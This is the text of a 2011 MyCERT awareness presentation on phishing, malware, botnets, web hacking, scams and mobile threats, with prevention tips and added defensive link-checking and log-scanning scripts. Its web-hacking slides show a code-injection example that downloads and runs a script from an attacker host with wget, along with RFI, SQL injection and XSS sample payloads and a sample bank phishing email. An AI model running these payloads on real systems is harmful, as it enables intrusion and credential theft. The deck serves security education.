ICT Security Seminar 2011, Ministry of Health Malaysia

Post on 30-Jan-2018

Ministry of Science, Technology & Innovation

Hacking Anatomy

Salahudin Wan Khairuzzaman

ICT Security Seminar 2011, Ministry of Health Malaysia

Securing Our Cyberspace

Copyright © 2009 CyberSecurity Malaysia

24/3/2011

Salahudin Wan Khairuzzaman GCIH, CEH, ENSA

Intrusion Analyst

Malaysia Computer Emergency Response Team (MyCERT)

Malware Research

Cyber Early Warning

LebahNet

Advisory and Alerts

Emerging Threats

Threats Visualization

MyCERT Statistics

2010 and Early 2011

Cyber999™

MyCERT – Emergency Services

Incidents Handled in 2010

Incidents Handled in 2011 (Jan-Feb)

Spam Emails in 2010

Spam Emails in 2011 (Jan-Feb)

Botnet drones & Malware Infection in 2010

Botnet drones & Malware Infection in 2010 (Jan-Feb)

Honeynet Project Incidents in 2010

Honeynet Project Incidents in 2011 (Jan-Feb)

Technical and Global Co-ordination

Technical Co-ordination

National Cooperation

• Vendors
• Law Enforcement, Authorities
• Regulators
• ISPs
• Cyber Security Experts
• MCMC
• DELL
• IBM
• gcert

Technical Coordination Centre

International Collaboration

• European Government CSIRTs Group (EGC)
• European Network and Information Security Agency (ENISA)
• Organization of American States (OAS) CERT
• Forum of Incident Response Teams

MyCERT is an SC member

“OIC CYBER EMERGENCY RESPONSE TEAM”

Organization of Islamic Countries Computer Emergency Response Teams

OIC-CERT Task Force Member

Pakistan, Saudi, Tunisia, Malaysia, UAE, Indonesia, Nigeria, Morocco, Brunei, Bahrain, Bangladesh, Oman, Egypt, Qatar, Syria, Kuwait, Jordan, Turkey

Current Trend and Threats

Overview

• Phishing
• Malware
• Botnet
• Web Hacking
• Scam
• Client Side Attack
• Mobile Devices

What threat is this?

More examples..

Phishing

• Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication [source: wikipedia]
• Still works today
• Targeting favourite banks in Malaysia / international
• Uses a long URL that masquerades as the original website

Phishing Methodology

[Diagram, steps 1 to 4: Malicious Hackers, INTERNET, Victim, Real Website, Fake Website]

Phishing

That’s the old phishing attack… Let’s see how hackers redefine their tactics

Same Phishing Methodology

[Diagram, steps 1 to 4: Malicious Hackers, INTERNET, Victim, Real Website, Fake Website]

Phishing Redefined

We are hereby notifying you that we've recently suffered a DDos-Attack on one of our's Online Banking server. For security reasons you must complete the next steps to verify the integrity of your Maybank account. If you fail to complete the verification in the next 24 hours your account will be suspended.

Here's how to get started:

1. Log in to Maybank online account (click here).

2. You must request for TAC via Maybank online banking - your TAC will be sent via SMS to the mobile phone number you registered. (you can find the "Request a TAC" button in the Utilities menu of your account)

https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do

3. Logout from your account and close the browser.

4. When you have received the TAC (Transaction Authorization Code) on your mobile phone, go to our secured verification server and submit the requested information (Username, password and TAC). to go on our secured server. (click here)

5. Please allow 48 hours for processing.

Please comply and thanks for understanding.

***This is an automated message, please do not reply***

http://static-217-133-89-90.clienti.tiscali.it//

Phishing Website – Username, Password & Transaction Authorization Code

Phishing

Does it really work?

Prevention

Initiative from provider itself..

Phishing : Prevention

• Do not respond to e-mails requesting your personal information
• Do not open attachments or download files
• Do not click on links provided in e-mails.
• DontPhishMe add-ons in Mozilla Firefox and Chrome
  o https://addons.mozilla.org/en-US/firefox/addon/dontphishme/
• Netcraft Anti-Phishing toolbar
  o http://toolbar.netcraft.com/
• Report to MyCERT by forwarding the email to mycert@mycert.org.my
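A check a mail filter or reviewer can apply to links in a suspicious e-mail is sketched below as an added example; it is not code from the slides and not how DontPhishMe works. It assumes `maybank2u.com.my` is the bank's only login domain and uses constructed `example.net` URLs alongside the two URLs shown in the sample e-mail.

```python
from urllib.parse import urlsplit

# Assumption for this example: the only domain the bank serves logins from.
TRUSTED_DOMAINS = {"maybank2u.com.my"}
# Brand strings whose presence on an untrusted host suggests masquerading.
BRAND_TOKENS = ("maybank",)


def host_is_trusted(host, trusted=TRUSTED_DOMAINS):
    """True only if host equals a trusted domain or is a subdomain of it."""
    host = host.lower().rstrip(".")
    # The leading dot matters: "evilmaybank2u.com.my" must not match.
    return any(host == d or host.endswith("." + d) for d in trusted)


def classify_link(url):
    """Return (verdict, reasons) for one URL taken from an e-mail."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return "untrusted", ["URL cannot be parsed"]

    trusted_host = host_is_trusted(host)
    reasons = []
    if parts.scheme.lower() != "https":
        reasons.append("scheme is not https")
    if parts.username is not None:
        # Text before '@' is user-info, not the host the browser contacts.
        reasons.append("user-info before '@' can hide the real host")
    if not trusted_host:
        reasons.append("host %s is not a trusted domain" % (host or "<none>"))
    if not reasons:
        return "trusted", reasons

    # Long URLs that embed the bank's name in a subdomain, user-info or path.
    visible = (parts.netloc + parts.path).lower()
    if not trusted_host and any(tok in visible for tok in BRAND_TOKENS):
        reasons.append("brand name appears in a URL on an untrusted host")
        return "masquerading", reasons
    return "untrusted", reasons


if __name__ == "__main__":
    samples = [
        # The two URLs shown in the sample e-mail on the slides.
        "https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do",
        "http://static-217-133-89-90.clienti.tiscali.it//",
        # Constructed long URLs that imitate the real one.
        "http://www.maybank2u.com.my.secure-login.example.net/mbb/m2u/common/M2ULogin.do",
        "https://www.maybank2u.com.my@login.example.net/",
    ]
    for url in samples:
        verdict, reasons = classify_link(url)
        print(verdict.ljust(13), url)
        for reason in reasons:
            print("              -", reason)
```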

DontPhishMe

• Below is the list of supported online banking websites:
  o Maybank2u
  o Cimbclicks
  o Public Bank
  o Bank Rakyat
  o Bank Islam
  o HSBC
  o EON Bank
  o UOB
  o AMBank
  o OCBC
  o RHB
  o Citibank
  o Standard Chartered Bank
  o Al Rajhi Bank
  o Affin Bank

DontPhishMe screenshots

What threat is this?

Malware

• A computer program created with malicious intent.
• It performs malicious tasks:
  o Stealing your identity
  o Key logging
  o Disrupt system
  o Damage data
  o Attack other computers

Malware

• We can get infected by malware from almost everywhere:
  o Web (drive by download, web exploitation, flash)
  o Fake antivirus
  o Email (email attachment, links)
  o Files (pdf, doc, jpeg, etc. [file exploitation])
  o Video/Mp3 (fake codec, file exploitation)
  o Portable hard disk
  o Errr..your USB storage?

Malware

• Unpatched systems or systems with vulnerable applications will easily become targets for malware.
• Malicious software includes
  o Trojan horse
  o Virus
  o Worms

A computer worm is a self-replicating malware computer program.

A Trojan horse is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.

A computer virus is a computer program that can copy itself and infect a computer.

Malware: What MyCERT Observed?

• MyCERT has collected more than 25K unique samples.
• Most of them are detected by antivirus software.
• Using the honeypot concept (low interaction) for collecting malware.
• Most likely coming from hosts infected by some sort of malware.
• Malware is normally distributed by IRC, FTP and HTTP

Threatexpert geographic

VirusTotal statistics

Malware: Scenario (Conficker)

Malware : Conficker : What MyCERT Observed?

Top Country

Top .my Domain Requested

Current trends

• Targeted attacks
  o Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment
  o spread using infected removable drives such as USB flash drives
  o designed to target only Siemens Supervisory Control And Data Acquisition (SCADA) systems
  o Targeting 5 Iranian organizations - probable target widely suspected to be uranium enrichment infrastructure in Iran.

Prevention

Malware : Prevention

• Patch.. Patch.. Patch.. and Patch (OS & Applications)
• Make sure Antivirus is installed and up-to-date
• Stay away from illegal/questionable sites
• Be careful with mail attachments!
• Be careful with ‘autorun’ thumbdrive
• Report to MyCERT : mycert@mycert.org.my

Botnet

• A botnet is a collection of compromised computers (called Zombie computers) running software, usually installed via worms, Trojan horses, or backdoors, under a common command-and-control (C&C) infrastructure.
• Used to perform DDoS, automated hacking, spamming, etc.

Botnet : Scenario

1. Botnet operator sends out viruses or worms
   • infect ordinary users [trojan application is the bot]
2. The bot on the infected PC logs into an IRC server
   • Server is known as the command-and-control server
3. Spammer gets access to botnet from operator
4. Spammer sends instructions to the infected PCs
5. Infected PCs send out spam messages

Botnet : DDoS

Web Hacking

Web Security Threats

RFI

CODE INJECTION

lala.php?Id=1&cmd=uname –a || wget hax0r.net/ipwn3du.sh && ./ipwn3du.sh && rm ipwn3du.sh

What threat is this?

Web Defacement

Web defacement is an attack on a website that changes the visual appearance of the site.

These are typically the work of a system cracker, who breaks into a web server and replaces the hosted website with one of their own.

A message is often left on the webpage along with a shout-out to his or her friends.

Web Hacking

When attackers successfully attack a website, they can:

o Change or view the disclosed information on the sites
o Change account information, edit the database.
o Remove the entire website, drop the database, etc.
o Deface the web pages
o Many more..

Web Hacking

• Most common methods:
  o RFI
    [ex. drop sites: =http://www.example/malicious-code.txt??]
  o SQL Injection
    Union
    Select
    %20
    %27
  o XSS - enables malicious attackers to inject client-side script into web pages viewed by other users
    <SCRIPT>alert("XSS")</SCRIPT>

What threat is this?

• This is what we see:

Remote File Inclusion + Steganography

• This is what the attacker has

Prevention

Web Hacking : Prevention

• Patch.. Patch.. Patch.. and Patch (OS & Applications)
• Secure coding practice
  o http://www.mycert.org.my/en/resources/web_security/main/main/detail/573/index.html
• Secure configurations
  o Modified php.ini
    allow_url_include=off
    register_globals=off
• 3rd party applications (GreenSQL, PHP-IDS, modSecurity, etc.)
• Web Application Firewall (WAF)
• Log analysis (from time to time)
• Report to MyCERT : mycert@mycert.org.my
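The log-analysis step can be automated for the three methods listed under "Most common methods" (RFI, SQL injection, XSS). The script below is an added example, not MyCERT's tooling; the log lines are constructed, use documentation IP ranges, and assume the Apache/NCSA access-log layout.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache/NCSA access-log entry: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# One rule per method named on the slide. The RFI rule also fires on
# legitimate "?next=http://..." redirects, so hits are leads to review.
RULES = [
    ("RFI", re.compile(r"[?&][^=&]*=\s*(?:https?|ftp)://", re.I)),
    ("SQLi", re.compile(
        r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b"
        r"|'\s*(?:or|and)\b|'\s*(?:--|#)", re.I)),
    ("XSS", re.compile(r"<\s*script\b", re.I)),
]

# Constructed sample log (invented paths, documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Mar/2011:10:01:02 +0800] "GET /index.php?id=1 HTTP/1.1" 200 5120
192.0.2.44 - - [24/Mar/2011:10:01:09 +0800] "GET /index.php?page=http://www.example/malicious-code.txt?? HTTP/1.1" 200 312
198.51.100.7 - - [24/Mar/2011:10:02:30 +0800] "GET /news.php?id=1%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1" 500 0
198.51.100.7 - - [24/Mar/2011:10:02:41 +0800] "GET /search.php?q=%253CSCRIPT%253Ealert(%2522XSS%2522)%253C/SCRIPT%253E HTTP/1.1" 200 840
203.0.113.5 - - [24/Mar/2011:10:03:00 +0800] "GET /about.html HTTP/1.1" 200 2048
"""


def fully_decode(text, max_rounds=3):
    """Undo URL encoding repeatedly so double encoding (%2527) is seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_log(log_text):
    """Return (ip, status, labels, decoded_target) per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not an access-log entry
        target = fully_decode(match.group("target"))
        labels = [name for name, rule in RULES if rule.search(target)]
        if labels:
            findings.append(
                (match.group("ip"), int(match.group("status")), labels, target)
            )
    return findings


def hits_by_client(findings):
    """Count suspicious requests per client address."""
    return Counter(ip for ip, _status, _labels, _target in findings)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip, status, labels, target in results:
        print(ip, status, ",".join(labels), target)
    print(dict(hits_by_client(results)))
```

A 200 status on an RFI or SQL injection hit deserves the first look, since the request was served rather than rejected.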

Prevention : Network Design

• With proper network design/firewall rules, we can reduce the threat as well:
  o DMZ (web server) is not allowed to connect using the IRC protocol
  o DMZ (web server) is not allowed to establish connections to unknown sites/FTP servers
  o DMZ (web server) is not allowed to establish connections to search engines
  o Proxied web server?

What threat is this?

• Dear Sir/Madam, Congratulations! We are pleased to announce you as one of the 3 lucky winners in the FLASH MEGA LOTTERY draw held today. All 3 winning addresses were randomly selected from a batch of 5,000,000 international emails. Your email address emerged alongside to others as a 3rd category winner in this month's draw. Consequently, you have therefore been approved for a total pay out of $1,950,000.00 Dollars (One Million Nine Hundred and Fifty Thousand United State Dollars) only.

Scam

• May be related to phishing
• Nigerian or Russian Scam
• Normally through email with title “From the desk of Mr [name]” or “Your Assistance is needed”
• Email-Hijacking / Friends Scams
• Purchasing goods and online.
• Lottery scam.
• Pet scam.
• Fake job offer.
• Etc. You name it!

Prevention

• Do not expose your 16-digit card number
• Customer Card ID Number (CID or CVV2 number)
• Expiry Date
• This scam is normally conducted by phone.
• Google your full name to protect your information.
• Do not respond to anonymous e-mail
• Bill Gates doesn’t give free iPods through the internet.
• Make sure you follow up on any process or procedures.
• http://www.hoax-slayer.com/

Hoax-Slayer is dedicated to debunking email hoaxes, thwarting Internet scammers, combating spam, and educating web users about email and Internet security issues

What’s now/next?

Client Side Attack

• Target vulnerabilities in client applications that interact with a malicious server or process malicious data.
• Common Target
  o Browser (IE, Firefox, Chrome, Safari)
  o PDF Reader (Adobe Acrobat, Foxit)
  o Flash Player
  o Multimedia Plugin (Java, Quicktime, ActiveX)
  o Microsoft Office Apps (Excel, PowerPoint)

Client Side Attack

• Used in ‘Targeted Attack’
  o Scenario: Receive file with attachment from boss
• Normally uses current propaganda to conduct social engineering:
  o US Presidential Election
  o Tibetan Movement
  o Pharmacy spam
  o Swine Flu
  o Michael Jackson

Client Side Attack : Acrobat Reader (1)

Client Side Attack : Acrobat Reader (2)

Client Side Attack : Advisories 2010

• MA-261.122010: MyCERT Alert - Critical Vulnerability in Microsoft Internet Explorer
• MA-257.112010: Multiple Critical Vulnerabilities in Adobe Reader
• MA-256.112010: Critical Vulnerability in Microsoft Internet Explorer
• MA-255.102010: MyCERT Alert - Critical Vulnerability in Adobe Flash Player
• MA-254.102010: MyCERT Alert - Critical vulnerability in Mozilla Firefox
• MA-253.102010: MyCERT Alert - Critical Vulnerability in Adobe Shockwave Player
• MA-252.102010: MyCERT Alert - Multiple Critical Vulnerabilities in Oracle Java SE and Java for Business
• MA-250.092010: MyCERT Alert - Critical Vulnerability in Adobe Flash Player
• MA-249.092010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader
• MA-246.082010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player
• MA-245.082010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader
• MA-243.082010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Flash Player
• MA-242.082010: MyCERT Alert - Latest Patch for Microsoft Vulnerabilities (August 2010)
• MA-234.062010: MyCERT Alert - Critical Vulnerabilities in Adobe Flash Player, Adobe Reader and Acrobat
• MA-232.052010: MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player
• MA-230.052010: MyCERT Alert - Critical Vulnerability in Safari Web Browser
• MA-229.042010: MyCERT Advisory - Vulnerability in Microsoft Sharepoint Could Allow Elevation of Privilege
• MA-226.042010: MyCERT Alert - Multiple Critical Vulnerability in Adobe Acrobat and Reader
• MA-225.042010: MyCERT Alert - Oracle JRE Java Platform SE and Java Deployment Toolkit Plugins Code Execution Vulnerabilities
• MA-221.032010: MyCERT Alert – Critical Vulnerability in Microsoft Internet Explorer
• MA-218.032010: MyCERT Alert - Microsoft Windows Help File Code Execution Vulnerability Within Internet Explorer via VBScript
• MA-217.022010: MyCERT Alert - Critical Vulnerability in Adobe Download Manager
• MA-216.022010: MyCERT Alert - Critical Vulnerability in Adobe Acrobat and Adobe Reader
• MA-214.022010: MyCERT Alert - Information disclosures vulnerabilities in Internet Explorer
• MA-212.012010: MyCERT Alert - Google Chrome Multiple Critical Vulnerabilities

Prevention

Client Side Attack : Prevention

• Patch.. Patch.. Patch.. and Patch (OS & Applications)
• Make sure Antivirus is installed and up-to-date
• Be careful with mail attachments and URLs!
• Stay away from questionable sites
• Use extra protection :) (Firewall, F-Secure Exploit Shield, Google Safe Browsing API (about:config))
• Report to MyCERT : mycert@mycert.org.my

Google safe browsing API

Mobile Devices

• Target mobile phone with specific Operating System
• Very recent
• Attacking method:
  o SMS
  o MMS
  o Attachment
  o Bluetooth
  o Warez/free applications downloaded (not official)

Mobile Devices : Transmitter.C (malware)

Mobile Malware

Skull.D, Commwarrior, Blankfont, Doomboot

Mobile Malware (cont’d)

Mobile Devices

• Affected Product
  o iPhone (Safari browser)
  o Symbian (SMS, MMS, Warez, File)
  o Windows Mobile [HTC] (Bluetooth, Warez)
  o BlackBerry (Attachment)
  o Android devices

Mobile Devices : Advisories

• MA-177.072009: MyCERT Alert - 0day in HTC (Windows Mobile) OBEX FTP Service - Directory Traversal
• MA-176.072009: MyCERT Alert - 0day in Symbian S60 (Nokia) Firmware Media Codecs - Multiple Memory Corruption Vulnerabilities
• MA-174.072009: MyCERT Alert - Transmitter.C Mobile Malware Advisory
• MA-193.092009: MyCERT Alert - Critical Vulnerability in iPhone and iPod Touch Operating System
• MA-213.022010: MyCERT Alert - Latest Security Update for iPhone OS and iPod Touch (February 2010)
• MA-274.032011: MyCERT Alert - Critical Vulnerability in Webkit Browser Engine for BlackBerry

Prevention

Client Side Attack : Prevention

• Patch.. Patch.. Patch.. and Patch (if available)
• Do not open questionable SMS, MMS or files
• Do not browse to unknown websites received via SMS or MMS from known or unknown persons
• Do not download and install unknown or untrusted third party applications uploaded to websites and forums
• Do not accept pairing or connection requests from unknown sources
• It is recommended to use Antivirus
• Report to MyCERT : mycert@mycert.org.my

Google search tips

• “keywords” filetype:doc
• “keywords” site:my
• “keywords” inurl:google.com
• “keywords” inurl:phpmyadmin
• Phrase search “ “
• Calculator
• Currency Converter
• word1 OR word2 -- finds pages that include either word
• word1 AND word2 -- finds pages that include both words
• Term you want to exclude (-) (e.g. word1 -word2)
• Term you want to include (+) (e.g. word1 +word2)

Conclusion

Small Issues, BIG Problem

Security is OUR Responsibility

Mode of Incident Referrals

1. Email
   • cyber999@cybersecurity.my
   • mycert@mycert.org.my
2. Phone
   • +603 8992 6969
   • +1300-88-2999
3. Fax
   • +603 8945 3442
4. SMS
   • +6019 281 3801
5. Mobile (24x7)
   • +6019 266 5850
6. Online – http://www.mycert.org.my

Office Hours – MYT 0830 - 1730

Q & A

THANK YOU

salahudin@cybersecurity.my

Our Websites and emails

http://www.cybersecurity.my → Corporate website
http://www.mycert.org.my → Technical website
http://www.esecurity.org.my → Awareness Portal
http://cnii.cybersecurity.my for
cyber999@cybersecurity.my → for incident reporting
info@cybersecurity.my → for general inquiries
mycert@mycert.org.my